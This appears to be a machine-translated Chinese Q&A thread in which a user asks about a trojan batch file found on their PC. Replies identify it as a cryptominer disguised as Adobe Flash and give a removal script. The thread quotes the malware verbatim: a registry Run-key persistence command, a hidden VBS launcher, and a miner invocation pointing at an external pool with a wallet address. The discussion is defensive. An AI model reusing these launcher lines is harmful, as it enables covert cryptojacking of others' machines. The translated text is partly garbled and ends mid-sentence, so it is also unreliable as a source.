Batch file 解释特洛伊bat文件
一天早上,我的系统真的很慢。任务管理器显示Internet下载管理器正在运行,尽管我从未安装过它。我在“用户/(我的帐户)/appdata/roaming/adobe/flashplayer/purecache”中找到了它的位置。它占用了相当多的CPU 网上搜索显示,可能是某种恶意软件脚本在运行。每当我早上通过注册表中的一个条目启动时,它就会自动启动。我不知道它在我的系统上有多长时间了 启动它的bat文件是:Batch file 解释特洛伊bat文件,batch-file,trojan,Batch File,Trojan,一天早上,我的系统真的很慢。任务管理器显示Internet下载管理器正在运行,尽管我从未安装过它。我在“用户/(我的帐户)/appdata/roaming/adobe/flashplayer/purecache”中找到了它的位置。它占用了相当多的CPU 网上搜索显示,可能是某种恶意软件脚本在运行。每当我早上通过注册表中的一个条目启动时,它就会自动启动。我不知道它在我的系统上有多长时间了 启动它的bat文件是: @echo off %windir%\system32\reg.exe add HKC
@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat\"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" -o stratum+tcp://ns1.eaglecloud.su:9327 -u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x
与bat文件位于同一文件夹中的vbs脚本文件为:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
我已经从我的系统中删除了所有的条目,但我担心可能发生了什么,因为我不知道这在我的系统上已经有多长时间了
我知道这是某种特洛伊木马。但是有人能帮我解释一下bat和脚本文件,以及它们发送给ns1.eaglecould.su的信息吗
多谢各位
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Users\David Candy>nslookup -type=all ns1.eaglecloud.su
Server: vodafonemobile.vmb
Address: 192.168.1.1
Non-authoritative answer:
ns1.eaglecloud.su internet address = 95.47.160.203
(root) ??? unknown type 41 ???
C:\Users\David Candy>nslookup -type=mx ns1.eaglecloud.su
Server: vodafonemobile.vmb
Address: 192.168.1.1
eaglecloud.su
primary name server = fred.ns.cloudflare.com
responsible mail addr = dns.cloudflare.com
serial = 2015717786
refresh = 10000 (2 hours 46 mins 40 secs)
retry = 2400 (40 mins)
expire = 604800 (7 days)
default TTL = 3600 (1 hour)
(root) ??? unknown type 41 ???
C:\Users\David Candy>nslookup -type=mx cloudflare.com
Server: vodafonemobile.vmb
Address: 192.168.1.1
Non-authoritative answer:
cloudflare.com MX preference = 30, mail exchanger = alt2.aspmx.l.google.com
cloudflare.com MX preference = 40, mail exchanger = aspmx2.googlemail.com
cloudflare.com MX preference = 50, mail exchanger = aspmx3.googlemail.com
cloudflare.com MX preference = 10, mail exchanger = aspmx.l.google.com
cloudflare.com MX preference = 20, mail exchanger = alt1.aspmx.l.google.com
aspmx2.googlemail.com internet address = 74.125.193.26
aspmx3.googlemail.com internet address = 74.125.196.26
aspmx.l.google.com internet address = 74.125.25.26
alt1.aspmx.l.google.com internet address = 74.125.193.27
alt2.aspmx.l.google.com internet address = 74.125.196.27
(root) ??? unknown type 41 ???
我会向Cloudflare和Google抱怨这一点,因为他们正在使用他们的基础设施。很抱歉唤醒了一个古老的话题,但我遇到了同样的问题。不过我有一个解决办法。幸运的是,它不是特洛伊木马 此恶意软件模拟Adobe updater实用程序。但是,Adobe始终对其生产程序进行数字签名。它是一家比特币矿商。我通过查找用于与internet通信的地层+tcp协议发现了这一点。这篇文章返回了一页关于比特币矿商的结果 批处理文件实际上是在注册表中创建一个新条目,以便矿工在您登录时自动启动。这家矿商利用您的CPU能力为在线货币比特币(Bitcoin)挖掘哈希值,类似于您的国家印刷纸币的方式。据我所知,它不涉及任何个人文件 删除注册表项和相关文件对我来说都会杀死它。下面是一个批处理脚本,它可以为您完成所有这些
@echo off
echo Starting removal. Please make sure that you've closed IDMan.exe
pause
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AdobeFlashPlayer /f
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.bat"
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs"
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe"
del "%appdata%\Adobe\Flash Player\PureCache\libcurl.dll"
del "%appdata%\Adobe\Flash Player\PureCache\pthreadGC2.dll"
del "%appdata%\Adobe\Flash Player\PureCache\zlib1.dll"
echo Removal complete.
pause
将它粘贴到批处理文件中,您应该可以开始了。没有任何线索表明“IDMan.exe”可以做什么,我可以看到它每次都是如何启动的-修改注册表项
HKCU\software\microsoft\windows\currentversion\run
(当我想知道系统的启动方式时,我会在这里查看).谷歌可能会停止提供电子邮件服务,但据我所知,()。